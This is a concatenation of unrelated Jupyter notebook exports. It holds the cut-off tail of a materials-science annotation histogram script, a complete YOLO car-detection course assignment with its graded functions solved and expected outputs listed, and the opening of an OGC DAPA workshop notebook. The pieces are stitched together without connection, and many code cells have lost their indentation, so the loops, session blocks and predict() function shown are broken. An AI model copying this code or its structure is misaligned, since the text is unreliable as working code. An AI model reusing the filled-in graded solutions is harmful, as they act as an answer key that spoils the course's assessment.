"names": ["heat", "therm"]
},
"magnetic susceptibility": {
"total":0,
"values": [],
"names": ["susceptibilit"]
},
"resistivity": {
"total":0,
"values": [],
"names": ["resistivit", "resistance", "electrical"]
},
"magnetisation": {
"total":0,
"values": [],
"names": ["magneti"]
},
"empirical calculation": {
"total":0,
"values": [],
"names": ["calcula", "predict", "theor"]
}
}
not_assigned = []
assigned = False
for key in local_distribution.keys():
for key_class, value in classes.items():
for names in value['names']:
if names in str.lower(key):
# NOTE(review): this appends the class name itself rather than the
# matched content (`key`), so "values" fills with copies of its own
# class name — confirm whether `key` was intended here.
classes[key_class]["values"].append(key_class)
classes[key_class]["total"] += local_distribution[key]
assigned = True
break
if assigned:
break
if assigned == False:
not_assigned.append(key)
else:
assigned = False
## HISTOGRAM
plt.rcdefaults()
fig, ax = plt.subplots()
items = [classes[c]["total"] for c in classes]
keys = list(classes.keys())
ax.barh(keys, items , align='center')
ax.set_yticklabels(keys)
ax.invert_yaxis() # labels read top-to-bottom
ax.set_xlabel('Frequency')
# NOTE(review): `label` is left over from an earlier cell's loop, not defined in
# this cell — the title probably meant to use `name`; confirm.
ax.set_title(label +' annotation aggregated distribution')
plt.show()
print("Not assigned to any class: ")
print(not_assigned)
```
## Pressure
the label `<pressure>`
```
entities_statistics = result['entities_statistics']
plot_top_10('pressure', entities_statistics)
```
## Critical temperature value
the label `<tcValue>`
```
entities_statistics = result['entities_statistics']
plot_top_10('tcValue', entities_statistics)
```
| github_jupyter |
# Autonomous driving - Car detection
Welcome to your week 3 programming assignment. You will learn about object detection using the very powerful YOLO model. Many of the ideas in this notebook are described in the two YOLO papers: Redmon et al., 2016 (https://arxiv.org/abs/1506.02640) and Redmon and Farhadi, 2016 (https://arxiv.org/abs/1612.08242).
**You will learn to**:
- Use object detection on a car detection dataset
- Deal with bounding boxes
Run the following cell to load the packages and dependencies that are going to be useful for your journey!
```
import argparse
import os
import matplotlib.pyplot as plt
from matplotlib.pyplot import imshow
import scipy.io
import scipy.misc
import numpy as np
import pandas as pd
import PIL
import tensorflow as tf
from keras import backend as K
from keras.layers import Input, Lambda, Conv2D
from keras.models import load_model, Model
from yolo_utils import read_classes, read_anchors, generate_colors, preprocess_image, draw_boxes, scale_boxes
from yad2k.models.keras_yolo import yolo_head, yolo_boxes_to_corners, preprocess_true_boxes, yolo_loss, yolo_body
%matplotlib inline
```
**Important Note**: As you can see, we import Keras's backend as K. This means that to use a Keras function in this notebook, you will need to write: `K.function(...)`.
## 1 - Problem Statement
You are working on a self-driving car. As a critical component of this project, you'd like to first build a car detection system. To collect data, you've mounted a camera to the hood (meaning the front) of the car, which takes pictures of the road ahead every few seconds while you drive around.
<center>
<video width="400" height="200" src="nb_images/road_video_compressed2.mp4" type="video/mp4" controls>
</video>
</center>
<caption><center> Pictures taken from a car-mounted camera while driving around Silicon Valley. <br> We would like to especially thank [drive.ai](https://www.drive.ai/) for providing this dataset! Drive.ai is a company building the brains of self-driving vehicles.
</center></caption>
<img src="nb_images/driveai.png" style="width:100px;height:100;">
You've gathered all these images into a folder and have labelled them by drawing bounding boxes around every car you found. Here's an example of what your bounding boxes look like.
<img src="nb_images/box_label.png" style="width:500px;height:250;">
<caption><center> <u> **Figure 1** </u>: **Definition of a box**<br> </center></caption>
If you have 80 classes that you want YOLO to recognize, you can represent the class label $c$ either as an integer from 1 to 80, or as an 80-dimensional vector (with 80 numbers) one component of which is 1 and the rest of which are 0. The video lectures had used the latter representation; in this notebook, we will use both representations, depending on which is more convenient for a particular step.
In this exercise, you will learn how YOLO works, then apply it to car detection. Because the YOLO model is very computationally expensive to train, we will load pre-trained weights for you to use.
## 2 - YOLO
YOLO ("you only look once") is a popular algorithm because it achieves high accuracy while also being able to run in real-time. This algorithm "only looks once" at the image in the sense that it requires only one forward propagation pass through the network to make predictions. After non-max suppression, it then outputs recognized objects together with the bounding boxes.
### 2.1 - Model details
First things to know:
- The **input** is a batch of images of shape (m, 608, 608, 3)
- The **output** is a list of bounding boxes along with the recognized classes. Each bounding box is represented by 6 numbers $(p_c, b_x, b_y, b_h, b_w, c)$ as explained above. If you expand $c$ into an 80-dimensional vector, each bounding box is then represented by 85 numbers.
We will use 5 anchor boxes. So you can think of the YOLO architecture as the following: IMAGE (m, 608, 608, 3) -> DEEP CNN -> ENCODING (m, 19, 19, 5, 85).
Let's look in greater detail at what this encoding represents.
<img src="nb_images/architecture.png" style="width:700px;height:400;">
<caption><center> <u> **Figure 2** </u>: **Encoding architecture for YOLO**<br> </center></caption>
If the center/midpoint of an object falls into a grid cell, that grid cell is responsible for detecting that object.
Since we are using 5 anchor boxes, each of the 19 x19 cells thus encodes information about 5 boxes. Anchor boxes are defined only by their width and height.
For simplicity, we will flatten the last two dimensions of the shape (19, 19, 5, 85) encoding. So the output of the Deep CNN is (19, 19, 425).
<img src="nb_images/flatten.png" style="width:700px;height:400;">
<caption><center> <u> **Figure 3** </u>: **Flattening the last two dimensions**<br> </center></caption>
Now, for each box (of each cell) we will compute the following elementwise product and extract a probability that the box contains a certain class.
<img src="nb_images/probability_extraction.png" style="width:700px;height:400;">
<caption><center> <u> **Figure 4** </u>: **Find the class detected by each box**<br> </center></caption>
Here's one way to visualize what YOLO is predicting on an image:
- For each of the 19x19 grid cells, find the maximum of the probability scores (taking a max across both the 5 anchor boxes and across different classes).
- Color that grid cell according to what object that grid cell considers the most likely.
Doing this results in this picture:
<img src="nb_images/proba_map.png" style="width:300px;height:300;">
<caption><center> <u> **Figure 5** </u>: Each of the 19x19 grid cells colored according to which class has the largest predicted probability in that cell.<br> </center></caption>
Note that this visualization isn't a core part of the YOLO algorithm itself for making predictions; it's just a nice way of visualizing an intermediate result of the algorithm.
Another way to visualize YOLO's output is to plot the bounding boxes that it outputs. Doing that results in a visualization like this:
<img src="nb_images/anchor_map.png" style="width:200px;height:200;">
<caption><center> <u> **Figure 6** </u>: Each cell gives you 5 boxes. In total, the model predicts: 19x19x5 = 1805 boxes just by looking once at the image (one forward pass through the network)! Different colors denote different classes. <br> </center></caption>
In the figure above, we plotted only boxes that the model had assigned a high probability to, but this is still too many boxes. You'd like to filter the algorithm's output down to a much smaller number of detected objects. To do so, you'll use non-max suppression. Specifically, you'll carry out these steps:
- Get rid of boxes with a low score (meaning, the box is not very confident about detecting a class)
- Select only one box when several boxes overlap with each other and detect the same object.
### 2.2 - Filtering with a threshold on class scores
You are going to apply a first filter by thresholding. You would like to get rid of any box for which the class "score" is less than a chosen threshold.
The model gives you a total of 19x19x5x85 numbers, with each box described by 85 numbers. It'll be convenient to rearrange the (19,19,5,85) (or (19,19,425)) dimensional tensor into the following variables:
- `box_confidence`: tensor of shape $(19 \times 19, 5, 1)$ containing $p_c$ (confidence probability that there's some object) for each of the 5 boxes predicted in each of the 19x19 cells.
- `boxes`: tensor of shape $(19 \times 19, 5, 4)$ containing $(b_x, b_y, b_h, b_w)$ for each of the 5 boxes per cell.
- `box_class_probs`: tensor of shape $(19 \times 19, 5, 80)$ containing the detection probabilities $(c_1, c_2, ... c_{80})$ for each of the 80 classes for each of the 5 boxes per cell.
**Exercise**: Implement `yolo_filter_boxes()`.
1. Compute box scores by doing the elementwise product as described in Figure 4. The following code may help you choose the right operator:
```python
a = np.random.randn(19*19, 5, 1)
b = np.random.randn(19*19, 5, 80)
c = a * b # shape of c will be (19*19, 5, 80)
```
2. For each box, find:
- the index of the class with the maximum box score ([Hint](https://keras.io/backend/#argmax)) (Be careful with what axis you choose; consider using axis=-1)
- the corresponding box score ([Hint](https://keras.io/backend/#max)) (Be careful with what axis you choose; consider using axis=-1)
3. Create a mask by using a threshold. As a reminder: `([0.9, 0.3, 0.4, 0.5, 0.1] < 0.4)` returns: `[False, True, False, False, True]`. The mask should be True for the boxes you want to keep.
4. Use TensorFlow to apply the mask to box_class_scores, boxes and box_classes to filter out the boxes we don't want. You should be left with just the subset of boxes you want to keep. ([Hint](https://www.tensorflow.org/api_docs/python/tf/boolean_mask))
Reminder: to call a Keras function, you should use `K.function(...)`.
```
# GRADED FUNCTION: yolo_filter_boxes
def yolo_filter_boxes(box_confidence, boxes, box_class_probs, threshold = .6):
    """Filters YOLO boxes by thresholding on object and class confidence.

    Arguments:
    box_confidence -- tensor of shape (19, 19, 5, 1), p_c (object confidence) per anchor box
    box_class_probs -- tensor of shape (19, 19, 5, 80), per-class detection probabilities
    boxes -- tensor of shape (19, 19, 5, 4), (b_x, b_y, b_h, b_w) per anchor box
    threshold -- real value; boxes whose highest class score is below it are dropped

    Returns:
    scores -- tensor of shape (None,), class probability score of each kept box
    boxes -- tensor of shape (None, 4), (b_x, b_y, b_h, b_w) of each kept box
    classes -- tensor of shape (None,), class index detected for each kept box

    Note: "None" appears because the number of surviving boxes depends on the
    threshold and is only known at graph-execution time.
    """
    # Per-box, per-class score: p_c * c_i (the (…,1) confidence broadcasts
    # across the 80 class probabilities).
    box_scores = box_class_probs * box_confidence

    # For every box: the best-scoring class and that class's score.
    best_classes = K.argmax(box_scores, axis=-1)
    best_scores = K.max(box_scores, axis=-1)

    # Boolean mask marking the boxes whose best score clears the threshold.
    keep = best_scores >= threshold

    # Retain only the surviving scores, coordinates and class indices.
    kept_scores = tf.boolean_mask(best_scores, keep)
    kept_boxes = tf.boolean_mask(boxes, keep)
    kept_classes = tf.boolean_mask(best_classes, keep)

    return kept_scores, kept_boxes, kept_classes
# Smoke test for yolo_filter_boxes on random tensors.
# NOTE(review): TF1-style Session/random_normal; under TF2 these live in
# tf.compat.v1 — confirm the notebook kernel runs TensorFlow 1.x.
with tf.Session() as test_a:
# Random stand-ins shaped like real YOLO outputs (19x19 grid, 5 anchors, 80 classes).
box_confidence = tf.random_normal([19, 19, 5, 1], mean=1, stddev=4, seed = 1)
boxes = tf.random_normal([19, 19, 5, 4], mean=1, stddev=4, seed = 1)
box_class_probs = tf.random_normal([19, 19, 5, 80], mean=1, stddev=4, seed = 1)
scores, boxes, classes = yolo_filter_boxes(box_confidence, boxes, box_class_probs, threshold = 0.5)
# Inspect one surviving box; shapes stay (?,) because the count is data-dependent.
print("scores[2] = " + str(scores[2].eval()))
print("boxes[2] = " + str(boxes[2].eval()))
print("classes[2] = " + str(classes[2].eval()))
print("scores.shape = " + str(scores.shape))
print("boxes.shape = " + str(boxes.shape))
print("classes.shape = " + str(classes.shape))
```
**Expected Output**:
<table>
<tr>
<td>
**scores[2]**
</td>
<td>
10.7506
</td>
</tr>
<tr>
<td>
**boxes[2]**
</td>
<td>
[ 8.42653275 3.27136683 -0.5313437 -4.94137383]
</td>
</tr>
<tr>
<td>
**classes[2]**
</td>
<td>
7
</td>
</tr>
<tr>
<td>
**scores.shape**
</td>
<td>
(?,)
</td>
</tr>
<tr>
<td>
**boxes.shape**
</td>
<td>
(?, 4)
</td>
</tr>
<tr>
<td>
**classes.shape**
</td>
<td>
(?,)
</td>
</tr>
</table>
### 2.3 - Non-max suppression ###
Even after filtering by thresholding over the class scores, you still end up with a lot of overlapping boxes. A second filter for selecting the right boxes is called non-maximum suppression (NMS).
<img src="nb_images/non-max-suppression.png" style="width:500px;height:400;">
<caption><center> <u> **Figure 7** </u>: In this example, the model has predicted 3 cars, but it's actually 3 predictions of the same car. Running non-max suppression (NMS) will select only the most accurate (highest probability) one of the 3 boxes. <br> </center></caption>
Non-max suppression uses the very important function called **"Intersection over Union"**, or IoU.
<img src="nb_images/iou.png" style="width:500px;height:400;">
<caption><center> <u> **Figure 8** </u>: Definition of "Intersection over Union". <br> </center></caption>
**Exercise**: Implement iou(). Some hints:
- In this exercise only, we define a box using its two corners (upper left and lower right): `(x1, y1, x2, y2)` rather than the midpoint and height/width.
- To calculate the area of a rectangle you need to multiply its height `(y2 - y1)` by its width `(x2 - x1)`.
- You'll also need to find the coordinates `(xi1, yi1, xi2, yi2)` of the intersection of two boxes. Remember that:
- xi1 = maximum of the x1 coordinates of the two boxes
- yi1 = maximum of the y1 coordinates of the two boxes
- xi2 = minimum of the x2 coordinates of the two boxes
- yi2 = minimum of the y2 coordinates of the two boxes
- In order to compute the intersection area, you need to make sure the height and width of the intersection are positive, otherwise the intersection area should be zero. Use `max(height, 0)` and `max(width, 0)`.
In this code, we use the convention that (0,0) is the top-left corner of an image, (1,0) is the upper-right corner, and (1,1) the lower-right corner.
```
# GRADED FUNCTION: iou
def iou(box1, box2):
    """Implement the intersection over union (IoU) between box1 and box2.

    Arguments:
    box1 -- first box, list object with coordinates (x1, y1, x2, y2)
    box2 -- second box, list object with coordinates (x1, y1, x2, y2)

    Returns:
    IoU as a float in [0, 1]; 0.0 when the union has zero area (both boxes
    degenerate), instead of raising ZeroDivisionError.
    """
    # Intersection rectangle: per-axis max of the upper-left corners and
    # min of the lower-right corners.
    xi1 = max(box1[0], box2[0])
    yi1 = max(box1[1], box2[1])
    xi2 = min(box1[2], box2[2])
    yi2 = min(box1[3], box2[3])
    # Clamp width/height at 0 so disjoint boxes yield zero intersection.
    inter_area = max(xi2 - xi1, 0) * max(yi2 - yi1, 0)

    # Union(A,B) = A + B - Inter(A,B). abs() keeps the area positive even if
    # a box's corners were given in reversed order (same result as the
    # original max/min formulation).
    box1_area = abs((box1[2] - box1[0]) * (box1[3] - box1[1]))
    box2_area = abs((box2[2] - box2[0]) * (box2[3] - box2[1]))
    union_area = box1_area + box2_area - inter_area

    # Robustness fix: two zero-area boxes give union_area == 0; report no
    # overlap rather than dividing by zero.
    if union_area == 0:
        return 0.0

    return inter_area / union_area
# Sanity check: the two boxes overlap in a 1x1 square, areas are 4 each,
# so IoU = 1 / (4 + 4 - 1) = 1/7 ≈ 0.142857.
box1 = (2, 1, 4, 3)
box2 = (1, 2, 3, 4)
print("iou = " + str(iou(box1, box2)))
```
**Expected Output**:
<table>
<tr>
<td>
**iou = **
</td>
<td>
0.14285714285714285
</td>
</tr>
</table>
You are now ready to implement non-max suppression. The key steps are:
1. Select the box that has the highest score.
2. Compute its overlap with all other boxes, and remove boxes that overlap it more than `iou_threshold`.
3. Go back to step 1 and iterate until there are no more boxes with a lower score than the currently selected box.
This will remove all boxes that have a large overlap with the selected boxes. Only the "best" boxes remain.
**Exercise**: Implement yolo_non_max_suppression() using TensorFlow. TensorFlow has two built-in functions that are used to implement non-max suppression (so you don't actually need to use your `iou()` implementation):
- [tf.image.non_max_suppression()](https://www.tensorflow.org/api_docs/python/tf/image/non_max_suppression)
- [K.gather()](https://www.tensorflow.org/api_docs/python/tf/gather)
```
# GRADED FUNCTION: yolo_non_max_suppression
def yolo_non_max_suppression(scores, boxes, classes, max_boxes = 10, iou_threshold = 0.5):
    """
    Applies Non-max suppression (NMS) to a set of boxes.

    Arguments:
    scores -- tensor of shape (None,), output of yolo_filter_boxes()
    boxes -- tensor of shape (None, 4), output of yolo_filter_boxes() that have been scaled to the image size (see later)
    classes -- tensor of shape (None,), output of yolo_filter_boxes()
    max_boxes -- integer, maximum number of predicted boxes you'd like
    iou_threshold -- real value, "intersection over union" threshold used for NMS filtering

    Returns:
    scores -- tensor of shape (None,), predicted score for each box
    boxes -- tensor of shape (None, 4), predicted box coordinates
    classes -- tensor of shape (None,), predicted class for each box

    Note: The "None" dimension of the output tensors is at most max_boxes.
    """
    # tf.image.non_max_suppression takes its size limit as a tensor, so build
    # and initialize an int32 variable holding max_boxes.
    max_boxes_tensor = K.variable(max_boxes, dtype='int32')
    K.get_session().run(tf.variables_initializer([max_boxes_tensor]))

    # Indices of the boxes NMS keeps. Fix: pass max_boxes_tensor here — the
    # original passed the plain Python int, leaving the initialized variable
    # unused (same numeric result, but the variable setup was dead code).
    nms_indices = tf.image.non_max_suppression(boxes, scores, max_boxes_tensor, iou_threshold=iou_threshold)

    # Select only the surviving scores, boxes and classes.
    scores = K.gather(scores, nms_indices)
    boxes = K.gather(boxes, nms_indices)
    classes = K.gather(classes, nms_indices)

    return scores, boxes, classes
# Smoke test for yolo_non_max_suppression on random tensors.
# NOTE(review): TF1-style Session; under TF2 this requires tf.compat.v1.
with tf.Session() as test_b:
# 54 random candidate boxes with random scores and (float) "classes".
scores = tf.random_normal([54,], mean=1, stddev=4, seed = 1)
boxes = tf.random_normal([54, 4], mean=1, stddev=4, seed = 1)
classes = tf.random_normal([54,], mean=1, stddev=4, seed = 1)
scores, boxes, classes = yolo_non_max_suppression(scores, boxes, classes)
# Expect at most max_boxes (default 10) boxes to survive.
print("scores[2] = " + str(scores[2].eval()))
print("boxes[2] = " + str(boxes[2].eval()))
print("classes[2] = " + str(classes[2].eval()))
print("scores.shape = " + str(scores.eval().shape))
print("boxes.shape = " + str(boxes.eval().shape))
print("classes.shape = " + str(classes.eval().shape))
```
**Expected Output**:
<table>
<tr>
<td>
**scores[2]**
</td>
<td>
6.9384
</td>
</tr>
<tr>
<td>
**boxes[2]**
</td>
<td>
[-5.299932 3.13798141 4.45036697 0.95942086]
</td>
</tr>
<tr>
<td>
**classes[2]**
</td>
<td>
-2.24527
</td>
</tr>
<tr>
<td>
**scores.shape**
</td>
<td>
(10,)
</td>
</tr>
<tr>
<td>
**boxes.shape**
</td>
<td>
(10, 4)
</td>
</tr>
<tr>
<td>
**classes.shape**
</td>
<td>
(10,)
</td>
</tr>
</table>
### 2.4 Wrapping up the filtering
It's time to implement a function taking the output of the deep CNN (the 19x19x5x85 dimensional encoding) and filtering through all the boxes using the functions you've just implemented.
**Exercise**: Implement `yolo_eval()` which takes the output of the YOLO encoding and filters the boxes using score threshold and NMS. There's just one last implementational detail you have to know. There're a few ways of representing boxes, such as via their corners or via their midpoint and height/width. YOLO converts between a few such formats at different times, using the following functions (which we have provided):
```python
boxes = yolo_boxes_to_corners(box_xy, box_wh)
```
which converts the yolo box coordinates (x,y,w,h) to box corners' coordinates (x1, y1, x2, y2) to fit the input of `yolo_filter_boxes`
```python
boxes = scale_boxes(boxes, image_shape)
```
YOLO's network was trained to run on 608x608 images. If you are testing this data on a different size image--for example, the car detection dataset had 720x1280 images--this step rescales the boxes so that they can be plotted on top of the original 720x1280 image.
Don't worry about these two functions; we'll show you where they need to be called.
```
# GRADED FUNCTION: yolo_eval
def yolo_eval(yolo_outputs, image_shape = (720., 1280.), max_boxes=10, score_threshold=.6, iou_threshold=.5):
    """
    Converts the output of YOLO encoding (a lot of boxes) to your predicted boxes along with their scores, box coordinates and classes.

    Arguments:
    yolo_outputs -- output of the encoding model (for image_shape of (608, 608, 3)), contains 4 tensors:
                    box_confidence: tensor of shape (None, 19, 19, 5, 1)
                    box_xy: tensor of shape (None, 19, 19, 5, 2)
                    box_wh: tensor of shape (None, 19, 19, 5, 2)
                    box_class_probs: tensor of shape (None, 19, 19, 5, 80)
    image_shape -- tensor of shape (2,) containing the input shape (float32)
    max_boxes -- integer, maximum number of predicted boxes you'd like
    score_threshold -- boxes whose highest class score is below this are discarded
    iou_threshold -- "intersection over union" threshold used for NMS filtering

    Returns:
    scores -- tensor of shape (None,), predicted score for each box
    boxes -- tensor of shape (None, 4), predicted box coordinates
    classes -- tensor of shape (None,), predicted class for each box
    """
    # Unpack the four tensors produced by the YOLO encoding.
    box_confidence, box_xy, box_wh, box_class_probs = yolo_outputs

    # (x, y, w, h) -> corner coordinates (x1, y1, x2, y2), the format the
    # filtering functions expect.
    corner_boxes = yolo_boxes_to_corners(box_xy, box_wh)

    # First filter: drop boxes whose best class score is under score_threshold.
    scores, corner_boxes, classes = yolo_filter_boxes(
        box_confidence, corner_boxes, box_class_probs, threshold=score_threshold)

    # Rescale from the 608x608 network frame back to the original image frame.
    corner_boxes = scale_boxes(corner_boxes, image_shape)

    # Second filter: non-max suppression removes overlapping detections.
    return yolo_non_max_suppression(scores, corner_boxes, classes, max_boxes, iou_threshold)
# Smoke test for yolo_eval on random tensors shaped like the YOLO encoding.
# NOTE(review): TF1-style Session; under TF2 this requires tf.compat.v1.
with tf.Session() as test_b:
yolo_outputs = (tf.random_normal([19, 19, 5, 1], mean=1, stddev=4, seed = 1),
tf.random_normal([19, 19, 5, 2], mean=1, stddev=4, seed = 1),
tf.random_normal([19, 19, 5, 2], mean=1, stddev=4, seed = 1),
tf.random_normal([19, 19, 5, 80], mean=1, stddev=4, seed = 1))
scores, boxes, classes = yolo_eval(yolo_outputs)
# Expect (10,) / (10, 4) / (10,): at most max_boxes survivors after NMS.
print("scores[2] = " + str(scores[2].eval()))
print("boxes[2] = " + str(boxes[2].eval()))
print("classes[2] = " + str(classes[2].eval()))
print("scores.shape = " + str(scores.eval().shape))
print("boxes.shape = " + str(boxes.eval().shape))
print("classes.shape = " + str(classes.eval().shape))
```
**Expected Output**:
<table>
<tr>
<td>
**scores[2]**
</td>
<td>
138.791
</td>
</tr>
<tr>
<td>
**boxes[2]**
</td>
<td>
[ 1292.32971191 -278.52166748 3876.98925781 -835.56494141]
</td>
</tr>
<tr>
<td>
**classes[2]**
</td>
<td>
54
</td>
</tr>
<tr>
<td>
**scores.shape**
</td>
<td>
(10,)
</td>
</tr>
<tr>
<td>
**boxes.shape**
</td>
<td>
(10, 4)
</td>
</tr>
<tr>
<td>
**classes.shape**
</td>
<td>
(10,)
</td>
</tr>
</table>
<font color='blue'>
**Summary for YOLO**:
- Input image (608, 608, 3)
- The input image goes through a CNN, resulting in a (19,19,5,85) dimensional output.
- After flattening the last two dimensions, the output is a volume of shape (19, 19, 425):
- Each cell in a 19x19 grid over the input image gives 425 numbers.
- 425 = 5 x 85 because each cell contains predictions for 5 boxes, corresponding to 5 anchor boxes, as seen in lecture.
- 85 = 5 + 80 where 5 is because $(p_c, b_x, b_y, b_h, b_w)$ has 5 numbers, and 80 is the number of classes we'd like to detect
- You then select only few boxes based on:
- Score-thresholding: throw away boxes that have detected a class with a score less than the threshold
- Non-max suppression: Compute the Intersection over Union and avoid selecting overlapping boxes
- This gives you YOLO's final output.
## 3 - Test YOLO pretrained model on images
In this part, you are going to use a pretrained model and test it on the car detection dataset. As usual, you start by **creating a session to start your graph**. Run the following cell.
```
sess = K.get_session()
```
### 3.1 - Defining classes, anchors and image shape.
Recall that we are trying to detect 80 classes, and are using 5 anchor boxes. We have gathered the information about the 80 classes and 5 boxes in two files "coco_classes.txt" and "yolo_anchors.txt". Let's load these quantities into the model by running the next cell.
The car detection dataset has 720x1280 images, which we've pre-processed into 608x608 images.
```
class_names = read_classes("model_data/coco_classes.txt")
anchors = read_anchors("model_data/yolo_anchors.txt")
image_shape = (720., 1280.)
```
### 3.2 - Loading a pretrained model
Training a YOLO model takes a very long time and requires a fairly large dataset of labelled bounding boxes for a large range of target classes. You are going to load an existing pretrained Keras YOLO model stored in "yolo.h5". (These weights come from the official YOLO website, and were converted using a function written by Allan Zelener. References are at the end of this notebook. Technically, these are the parameters from the "YOLOv2" model, but we will more simply refer to it as "YOLO" in this notebook.) Run the cell below to load the model from this file.
```
yolo_model = load_model("model_data/yolo.h5")
```
This loads the weights of a trained YOLO model. Here's a summary of the layers your model contains.
```
yolo_model.summary()
```
**Note**: On some computers, you may see a warning message from Keras. Don't worry about it if you do--it is fine.
**Reminder**: this model converts a preprocessed batch of input images (shape: (m, 608, 608, 3)) into a tensor of shape (m, 19, 19, 5, 85) as explained in Figure (2).
### 3.3 - Convert output of the model to usable bounding box tensors
The output of `yolo_model` is a (m, 19, 19, 5, 85) tensor that needs to pass through non-trivial processing and conversion. The following cell does that for you.
```
yolo_outputs = yolo_head(yolo_model.output, anchors, len(class_names))
```
You added `yolo_outputs` to your graph. This set of 4 tensors is ready to be used as input by your `yolo_eval` function.
### 3.4 - Filtering boxes
`yolo_outputs` gave you all the predicted boxes of `yolo_model` in the correct format. You're now ready to perform filtering and select only the best boxes. Lets now call `yolo_eval`, which you had previously implemented, to do this.
```
scores, boxes, classes = yolo_eval(yolo_outputs, image_shape)
```
### 3.5 - Run the graph on an image
Let the fun begin. You have created a (`sess`) graph that can be summarized as follows:
1. <font color='purple'> yolo_model.input </font> is given to `yolo_model`. The model is used to compute the output <font color='purple'> yolo_model.output </font>
2. <font color='purple'> yolo_model.output </font> is processed by `yolo_head`. It gives you <font color='purple'> yolo_outputs </font>
3. <font color='purple'> yolo_outputs </font> goes through a filtering function, `yolo_eval`. It outputs your predictions: <font color='purple'> scores, boxes, classes </font>
**Exercise**: Implement predict() which runs the graph to test YOLO on an image.
You will need to run a TensorFlow session, to have it compute `scores, boxes, classes`.
The code below also uses the following function:
```python
image, image_data = preprocess_image("images/" + image_file, model_image_size = (608, 608))
```
which outputs:
- image: a python (PIL) representation of your image used for drawing boxes. You won't need to use it.
- image_data: a numpy-array representing the image. This will be the input to the CNN.
**Important note**: when a model uses BatchNorm (as is the case in YOLO), you will need to pass an additional placeholder in the feed_dict {K.learning_phase(): 0}.
```
def predict(sess, image_file):
"""
Runs the graph stored in "sess" to predict boxes for "image_file". Prints and plots the predictions.
Arguments:
sess -- your tensorflow/Keras session containing the YOLO graph
image_file -- name of an image stored in the "images" folder.
Returns:
out_scores -- tensor of shape (None, ), scores of the predicted boxes
out_boxes -- tensor of shape (None, 4), coordinates of the predicted boxes
out_classes -- tensor of shape (None, ), class index of the predicted boxes
Note: "None" actually represents the number of predicted boxes, it varies between 0 and max_boxes.
"""
# Preprocess your image: resize to the 608x608 frame the network was trained on.
image, image_data = preprocess_image("images/" + image_file, model_image_size = (608, 608))
# Run the session with the correct tensors and choose the correct placeholders in the feed_dict.
# You'll need to use feed_dict={yolo_model.input: ... , K.learning_phase(): 0})
# NOTE(review): scores/boxes/classes and yolo_model are notebook globals from
# earlier cells; K.learning_phase(): 0 selects inference mode for BatchNorm.
### START CODE HERE ### (≈ 1 line)
out_scores, out_boxes, out_classes = sess.run([scores, boxes, classes], feed_dict={yolo_model.input: image_data , K.learning_phase(): 0})
### END CODE HERE ###
# Print predictions info
print('Found {} boxes for {}'.format(len(out_boxes), image_file))
# Generate colors for drawing bounding boxes.
colors = generate_colors(class_names)
# Draw bounding boxes on the image file
draw_boxes(image, out_scores, out_boxes, out_classes, class_names, colors)
# Save the predicted bounding box on the image
image.save(os.path.join("out", image_file), quality=90)
# Display the results in the notebook
# NOTE(review): scipy.misc.imread was removed in SciPy >= 1.2 — confirm the
# notebook pins an older SciPy, or this line needs imageio.imread instead.
output_image = scipy.misc.imread(os.path.join("out", image_file))
imshow(output_image)
return out_scores, out_boxes, out_classes
```
Run the following cell on the "test.jpg" image to verify that your function is correct.
```
out_scores, out_boxes, out_classes = predict(sess, "test.jpg")
```
**Expected Output**:
<table>
<tr>
<td>
**Found 7 boxes for test.jpg**
</td>
</tr>
<tr>
<td>
**car**
</td>
<td>
0.60 (925, 285) (1045, 374)
</td>
</tr>
<tr>
<td>
**car**
</td>
<td>
0.66 (706, 279) (786, 350)
</td>
</tr>
<tr>
<td>
**bus**
</td>
<td>
0.67 (5, 266) (220, 407)
</td>
</tr>
<tr>
<td>
**car**
</td>
<td>
0.70 (947, 324) (1280, 705)
</td>
</tr>
<tr>
<td>
**car**
</td>
<td>
0.74 (159, 303) (346, 440)
</td>
</tr>
<tr>
<td>
**car**
</td>
<td>
0.80 (761, 282) (942, 412)
</td>
</tr>
<tr>
<td>
**car**
</td>
<td>
0.89 (367, 300) (745, 648)
</td>
</tr>
</table>
The model you've just run is actually able to detect 80 different classes listed in "coco_classes.txt". To test the model on your own images:
1. Click on "File" in the upper bar of this notebook, then click "Open" to go on your Coursera Hub.
2. Add your image to this Jupyter Notebook's directory, in the "images" folder
3. Write your image's name in the code cell above
4. Run the code and see the output of the algorithm!
If you were to run your session in a for loop over all your images, here's what you would get:
<center>
<video width="400" height="200" src="nb_images/pred_video_compressed2.mp4" type="video/mp4" controls>
</video>
</center>
<caption><center> Predictions of the YOLO model on pictures taken from a camera while driving around the Silicon Valley <br> Thanks [drive.ai](https://www.drive.ai/) for providing this dataset! </center></caption>
<font color='blue'>
**What you should remember**:
- YOLO is a state-of-the-art object detection model that is fast and accurate
- It runs an input image through a CNN which outputs a 19x19x5x85 dimensional volume.
- The encoding can be seen as a grid where each of the 19x19 cells contains information about 5 boxes.
- You filter through all the boxes using non-max suppression. Specifically:
- Score thresholding on the probability of detecting a class to keep only accurate (high probability) boxes
- Intersection over Union (IoU) thresholding to eliminate overlapping boxes
- Because training a YOLO model from randomly initialized weights is non-trivial and requires a large dataset as well as lot of computation, we used previously trained model parameters in this exercise. If you wish, you can also try fine-tuning the YOLO model with your own dataset, though this would be a fairly non-trivial exercise.
**References**: The ideas presented in this notebook came primarily from the two YOLO papers. The implementation here also took significant inspiration and used many components from Allan Zelener's github repository. The pretrained weights used in this exercise came from the official YOLO website.
- Joseph Redmon, Santosh Divvala, Ross Girshick, Ali Farhadi - [You Only Look Once: Unified, Real-Time Object Detection](https://arxiv.org/abs/1506.02640) (2015)
- Joseph Redmon, Ali Farhadi - [YOLO9000: Better, Faster, Stronger](https://arxiv.org/abs/1612.08242) (2016)
- Allan Zelener - [YAD2K: Yet Another Darknet 2 Keras](https://github.com/allanzelener/YAD2K)
- The official YOLO website (https://pjreddie.com/darknet/yolo/)
**Car detection dataset**:
<a rel="license" href="http://creativecommons.org/licenses/by/4.0/"><img alt="Creative Commons License" style="border-width:0" src="https://i.creativecommons.org/l/by/4.0/88x31.png" /></a><br /><span xmlns:dct="http://purl.org/dc/terms/" property="dct:title">The Drive.ai Sample Dataset</span> (provided by drive.ai) is licensed under a <a rel="license" href="http://creativecommons.org/licenses/by/4.0/">Creative Commons Attribution 4.0 International License</a>. We are especially grateful to Brody Huval, Chih Hu and Rahul Patel for collecting and providing this dataset.
| github_jupyter |
# DAPA Evaluation Workshop: Introduction & Documentation
## Introduction
Welcome the OGC Testbed 16 DAPA evaluation workshop. With this Jupyter Notebook we (EOX IT Services and the German Aerospace Center - DLR) would like to provide you some introduction material, links to Jupyter Notebooks, and a documentation about our API definition.
